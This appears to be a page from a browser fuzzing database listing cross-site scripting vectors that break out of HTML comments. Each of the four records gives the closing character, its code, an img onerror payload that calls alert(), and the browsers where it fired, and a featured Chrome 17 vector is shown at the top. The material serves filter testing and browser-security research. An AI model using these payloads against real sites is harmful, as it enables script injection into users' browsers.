Featured vector
Chrome 17.0
<b id="id1" x=begin0x13f9aend >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
Fuzz vector cloud
907,629 Successful fuzzes
Fuzz Database
| Vector |
| Characters that close a html comment |
| Navigation - Found 4 record(s). Page 1 of 1 |
|
|
|
| Browsers |
| IE9.0 Win7 Win64 utf-8 edge |
|
| Test case |
View test case |
| Char |
|
| Name |
<control> = NULL
|
| Charcode |
0 |
| Hex |
0x00 |
| Vector |
--><!-- -- > <img src=xxx:x onerror=alert(0)> --> |
|
| Browsers |
| Firefox9.0 Win7 Win64 utf-8 edge | | Opera11.10 Win7 Win32 utf-8 edge | | Safari5.0 Win7 Win32 utf-8 edge | | Chrome17.0 Win7 Win64 utf-8 edge | | Chrome16.0 Linux Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown big5 edge | | Chrome18.0 Win7 Win64 utf-8 edge | | Firefox8.0 Win7 Win64 utf-8 9 | | Opera11.10 Linux Unknown utf-8 edge | | iPhone5.0 iPhone OSX Unknown utf-8 edge | | Default Browser0.0 unknown Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown ISO-8859-1 html5 edge | | Chrome17.0 MacOSX Unknown GB2312 html5 edge |
|
| Test case |
View test case |
| Char |
! |
| Name |
EXCLAMATION MARK = factorial
|
| Charcode |
33 |
| Hex |
0x21 |
| Vector |
--><!-- --!> <img src=xxx:x onerror=alert(33)> --> |
|
| Browsers |
| Firefox9.0 Win7 Win64 utf-8 edge | | Opera11.10 Win7 Win32 utf-8 edge | | IE9.0 Win7 Win64 utf-8 edge | | Safari5.0 Win7 Win32 utf-8 edge | | Chrome17.0 Win7 Win64 utf-8 edge | | Chrome16.0 Linux Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown big5 edge | | Chrome18.0 Win7 Win64 utf-8 edge | | Firefox8.0 Win7 Win64 utf-8 9 | | Opera11.10 Linux Unknown utf-8 edge | | iPhone5.0 iPhone OSX Unknown utf-8 edge | | Default Browser0.0 unknown Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown ISO-8859-1 html5 edge | | Chrome17.0 MacOSX Unknown GB2312 html5 edge |
|
| Test case |
View test case |
| Char |
- |
| Name |
HYPHEN-MINUS = hyphen or minus sign
|
| Charcode |
45 |
| Hex |
0x2d |
| Vector |
--><!-- ---> <img src=xxx:x onerror=alert(45)> --> |
|
| Browsers |
| Firefox9.0 Win7 Win64 utf-8 edge | | Opera11.10 Win7 Win32 utf-8 edge | | IE9.0 Win7 Win64 utf-8 edge | | Safari5.0 Win7 Win32 utf-8 edge | | Chrome17.0 Win7 Win64 utf-8 edge | | Chrome16.0 Linux Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown utf-8 edge | | Chrome16.0 MacOSX Unknown big5 edge | | Chrome18.0 Win7 Win64 utf-8 edge | | Firefox8.0 Win7 Win64 utf-8 9 | | Opera11.10 Linux Unknown utf-8 edge | | iPhone5.0 iPhone OSX Unknown utf-8 edge | | Default Browser0.0 unknown Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown utf-8 html5 edge | | Chrome17.0 MacOSX Unknown ISO-8859-1 html5 edge | | Chrome17.0 MacOSX Unknown GB2312 html5 edge |
|
| Test case |
View test case |
| Char |
> |
| Name |
GREATER-THAN SIGN
|
| Charcode |
62 |
| Hex |
0x3e |
| Vector |
--><!-- -->> <img src=xxx:x onerror=alert(62)> --> |
|
| Navigation - Found 4 record(s). Page 1 of 1 |
|
|
|